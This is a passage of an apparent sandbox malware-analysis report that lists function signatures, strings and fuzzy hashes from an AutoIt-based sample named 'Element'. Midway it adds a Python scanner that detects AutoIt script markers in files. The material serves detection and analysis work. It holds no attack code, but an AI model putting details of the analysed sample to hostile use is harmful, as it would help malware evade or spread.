                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Replicator::operator[]
                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                    • API String ID: 3676697650-3207858774
                    • Opcode ID: 99605e2383526ee8012360babda3d0c6136817440d8f7d671e624bac7ee90c05
                    • Instruction ID: caddce1a4957e9cee050a00ae7d9a219c7b652f1a17c081a8be57b3429f66fca
                    • Opcode Fuzzy Hash: 99605e2383526ee8012360babda3d0c6136817440d8f7d671e624bac7ee90c05
                    • Instruction Fuzzy Hash: 04817932710A84A9FB11DF65D4B83ED33A5E7A9748F888112DE4963795EF38C98BC740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                    • API String ID: 2667193904-1575078665
                    • Opcode ID: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                    • Instruction ID: 9ae783857b19c301205764ceb581beab64410676bfba773c76c866ff417e7b51
                    • Opcode Fuzzy Hash: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                    • Instruction Fuzzy Hash: EE913A22A19B9385EA509F24EC405B96364FF84F96F800232E5CDC3AA6DF7CD949C741
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated
                    • API String ID: 129472671-2362178303
                    • Opcode ID: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                    • Instruction ID: 54558e0d1aefe4d7fe052d194a42970c7a76951d354f2c00b5edec2d61ec0b0d
                    • Opcode Fuzzy Hash: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                    • Instruction Fuzzy Hash: DB514961E0EAA385FA609F24EC842782695AF45F87F440175E4CDC66B3EF6DED08D340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                    • API String ID: 2943138195-1464470183
                    • Opcode ID: bf9e2ef6a4500eadfd2ca890c12d4022265b85a4c33e0d1f1b90e11ac282344a
                    • Instruction ID: 0feebd4f15d59b69c864c05f4f32a043e72159f5adc07c3bae359635d598368c
                    • Opcode Fuzzy Hash: bf9e2ef6a4500eadfd2ca890c12d4022265b85a4c33e0d1f1b90e11ac282344a
                    • Instruction Fuzzy Hash: E6518C72B10B24F9FB10EB69E8B86EC37B4B724384F500019EE0957AA8DB34C5C6CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                    • API String ID: 3215553584-2617248754
                    • Opcode ID: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                    • Instruction ID: 7c2ccf5d6b294538c698b3310555ddd10a5397fe3bb6f765a81f7fcb7fcf78b3
                    • Opcode Fuzzy Hash: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                    • Instruction Fuzzy Hash: F141AE76A06B9589FB14CF25EC817AD33A4EB08B99F404136EE9C87B95DE3CD825C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleStringwprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 4007322891-4153970271
                    • Opcode ID: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                    • Instruction ID: 654f43dedca8fb4b26ae94d5a8aa7c3c02c48fb1ef1abb51c801498ec1aaabbe
                    • Opcode Fuzzy Hash: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                    • Instruction Fuzzy Hash: 21318C76A28A9292EB10DF24EC415BD6360FF84F85F804072FA9D8769ADF7CD905C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-2659433951
                    • Opcode ID: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                    • Instruction ID: 351d1bdf9d434bca90f6a8c5fc2cd6ac2a8ef34169b028c4008da88909d0c9c3
                    • Opcode Fuzzy Hash: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                    • Instruction Fuzzy Hash: 5F315C72A08B819AE740CF61EC883A837B4FB44B5AF140179CA9D97B56DF7CD558CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                    • String ID:
                    • API String ID: 2672075419-0
                    • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                    • Instruction ID: c00c0077503c1e86ddc7e63ede37f6a0fd9c961ef1bf66419fb13546a61c283c
                    • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                    • Instruction Fuzzy Hash: 06918E76B096928AEB508F65DC882BD23B5FB84F9AF140075DE8DC7786CF38E8559700
                    APIs
                      • Part of subcall function 00007FF6C587780C: CreateFileW.KERNEL32 ref: 00007FF6C5877876
                      • Part of subcall function 00007FF6C58941D0: GetCurrentDirectoryW.KERNEL32(?,00007FF6C58799C7), ref: 00007FF6C58941EC
                      • Part of subcall function 00007FF6C5875A50: GetFullPathNameW.KERNEL32(?,00007FF6C5875A3D,?,00007FF6C5874C50,?,?,?,00007FF6C587109E), ref: 00007FF6C5875A7B
                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF6C5879A60
                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF6C5879BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 2207129308-3738523708
                    • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                    • Instruction ID: 9e3f6a1741f1c1116622acce21fa296070c5a28e188204402d180bac835aa474
                    • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                    • Instruction Fuzzy Hash: BB129322B1A6A295EB10EF20DC401FD6764FB85B95F800132FACE87696DF7CD945CB40
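The function above carries the strings that identify this binary as an AutoIt v3 interpreter loading a compiled script ("AU3!" and "EA06", plus the include-resolution errors), and the earlier function at API String ID 2667193904-1575078665 carries the interpreter's registry path and "\Include\" suffix. The scanner below is an added triage helper, not Joe Sandbox code and not code from the sample: it looks for those exact markers in a file or byte buffer and reports their offsets. Two assumptions are made: that "AU3!" and "EA06" sit adjacent on disk as "AU3!EA06", and that interpreter strings may be stored either as ASCII or as UTF-16LE (the report shows wide-string APIs such as wcscat around them). The sample buffer at the bottom is constructed for illustration.

```python
"""Triage scanner for the AutoIt v3 markers listed in the report.

Added example; not part of Joe Sandbox or of the analysed sample.
Assumptions: "AU3!" + "EA06" are adjacent on disk; interpreter strings
may be ASCII or UTF-16LE. The SAMPLE buffer below is constructed.
"""
import sys

# Compiled-script signature pieces from the report, assumed adjacent.
SCRIPT_MAGIC = b"AU3!EA06"

# Interpreter strings copied from the report's String IDs.
INTERP_STRINGS = (
    "AutoIt v3",
    "Software\\AutoIt v3\\AutoIt",
    "\\Include\\",
    "#include depth exceeded",
)


def find_all(data: bytes, needle: bytes) -> list:
    """Return every offset of needle in data (overlapping hits allowed)."""
    hits, pos = [], data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + 1)
    return hits


def scan(data: bytes) -> dict:
    """Map each marker to its offsets; interpreter strings are tried in
    both ASCII and UTF-16LE and keyed by the encoding that matched."""
    result = {"AU3!EA06": find_all(data, SCRIPT_MAGIC)}
    for s in INTERP_STRINGS:
        offsets = {}
        for enc in ("ascii", "utf-16-le"):
            hits = find_all(data, s.encode(enc))
            if hits:
                offsets[enc] = hits
        result[s] = offsets
    return result


def verdict(data: bytes) -> str:
    """Coarse classification: script blob, interpreter, both, or neither."""
    r = scan(data)
    has_script = bool(r["AU3!EA06"])
    has_interp = any(r[s] for s in INTERP_STRINGS)
    if has_script and has_interp:
        return "autoit-compiled-with-interpreter"
    if has_script:
        return "autoit-script-blob"
    if has_interp:
        return "autoit-interpreter-only"
    return "no-autoit-markers"


# Constructed sample buffer (not bytes from the real sample): a fake MZ
# header, two UTF-16LE interpreter strings, then the script magic at 156.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + "AutoIt v3".encode("utf-16-le")
    + b"\x00" * 16
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le")
    + b"\x00" * 8
    + SCRIPT_MAGIC + b"\x01\x02\x03"
)

if __name__ == "__main__":
    # Usage: python autoit_markers.py <file>; falls back to SAMPLE.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(verdict(blob))
    for marker, where in scan(blob).items():
        print(f"{marker!r}: {where}")
```

Note that "AutoIt v3" is also a substring of the registry path, so it is reported twice in the constructed buffer; that is expected and is why the script-magic hit, not the name string, should drive any alert. A real AutoIt-compiled executable carries the interpreter strings in the main image and the script magic in its resource data, so the offsets from the scan give you the place to start carving the script.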
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: DestroySendStringUninitializeUnregisterWindow
                    • String ID: close all
                    • API String ID: 1992507300-3243417748
                    • Opcode ID: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                    • Instruction ID: cb661c5b640ec5c4491eacc963c5a245a3b355e386eb518dc52aa21fb392eec2
                    • Opcode Fuzzy Hash: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                    • Instruction Fuzzy Hash: 1ED12F21B0BA6281EE54EF16CD6027C2364BF94F86F544471EB9E97292DF3CDC628B44
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                    • API String ID: 0-1765764032
                    • Opcode ID: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                    • Instruction ID: c8277ee7608da61ed17358b02d8a29a26291b3519c448deae2251832f4819938
                    • Opcode Fuzzy Hash: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                    • Instruction Fuzzy Hash: 57A16B36B08BC286EB208F65E8402AD77A0FB88F99F444576DA8D87B56DF3CD945C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: shared_ptr$ErrorLast$HandleModule
                    • String ID: (
                    • API String ID: 3818824616-3887548279
                    • Opcode ID: 6df94605af3172dd56dabb8239c89d9470822726eac165c75e045d107a37431c
                    • Instruction ID: e2ddf685bc13307b9849c208dc585d8576722deb41546acc0105e8172e4c5916
                    • Opcode Fuzzy Hash: 6df94605af3172dd56dabb8239c89d9470822726eac165c75e045d107a37431c
                    • Instruction Fuzzy Hash: AF512F323296C456EB90D765F8347DBA7E2E389780F805525EA8E43B99EE7DC5448B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateObjectStockwcscat
                    • String ID: -----$SysListView32
                    • API String ID: 2361508679-3975388722
                    • Opcode ID: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                    • Instruction ID: a2615abfd6581d673b837821ed3bed1e10d05a7eb6a586b25a01c5c94ae6f8f7
                    • Opcode Fuzzy Hash: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                    • Instruction Fuzzy Hash: F751CF32A04BD19AE720CF25EC446DA73A5FB48B85F40413ADE8D87B5ADF38D955CB80
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                    • API String ID: 2943138195-2239912363
                    • Opcode ID: b8502d753cb8fbdb21851ae16ee27728c038d3baf5513044a2cf0921f7ed30ea
                    • Instruction ID: 72dada46185e86f6f9dce62759513eaee909362b23d21c823a9821c33ae9f908
                    • Opcode Fuzzy Hash: b8502d753cb8fbdb21851ae16ee27728c038d3baf5513044a2cf0921f7ed30ea
                    • Instruction Fuzzy Hash: 09515C72A10B99B8FB11DF64E8B83EC77B4B728758F444116CE4952B99DB3C81C6CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: AutoIt v3
                    • API String ID: 423443420-1704141276
                    • Opcode ID: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                    • Instruction ID: 185f58d6df650db6411f3eb6d0db1ea025e3a2b38745b24aefa09cbc4f0bde10
                    • Opcode Fuzzy Hash: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                    • Instruction Fuzzy Hash: 8F311976A08B8286E750CF51EC8876933B4FB84B5AF040179C9CD97B16EF7D9858C780
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                    • String ID:
                    • API String ID: 1617910340-0
                    • Opcode ID: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                    • Instruction ID: 92b03cfaf3b5905ff06619a097c5751efbf986db540ec64ea1bb4568539b869d
                    • Opcode Fuzzy Hash: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                    • Instruction Fuzzy Hash: DEC1CE32B29A518AEB14DF65DC853AC3761EB49BA9F005235DE6E9B7D5CF38E811C300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                    • String ID:
                    • API String ID: 3210457359-0
                    • Opcode ID: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                    • Instruction ID: d4dc72d12e761d5959af07392dbddaa9ff321588202cbd5ccad826dd294f651f
                    • Opcode Fuzzy Hash: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                    • Instruction Fuzzy Hash: AC61CD35A082E396F7349E258C417BA2755BFA0FA6F1084B1DA9D966E7CF3CEC409700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                    • String ID: ?
                    • API String ID: 500310315-1684325040
                    • Opcode ID: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                    • Instruction ID: 9502fc3d954e57a0665bf1b184e2d42b2db22ba6f2da82908ff60cec57fb4794
                    • Opcode Fuzzy Hash: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                    • Instruction Fuzzy Hash: DB61A272A196A286E750EF21EC401A977A8FF44F96F841235E98EC7A95DF3CED41C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
